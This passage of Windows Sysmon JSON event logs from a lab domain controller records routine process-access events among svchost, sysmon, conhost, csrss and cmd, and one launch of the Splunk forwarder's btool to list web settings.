0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1699,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1700,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1701,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1702,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1703,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001001650300}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1704,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.296\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nProcessId: 3900\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nParentProcessId: 3884\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.296","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001095660300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-001001650300}","ParentProcessId":"3884","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1705,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-001001650300}","SourceProcessId":"3884","SourceThreadId":"3888","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001095660300}","TargetProcessId":"3900","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1706,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001095660300}\r\nTargetProcessId: 3900\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001095660300}","TargetProcessId":"3900","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1707,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 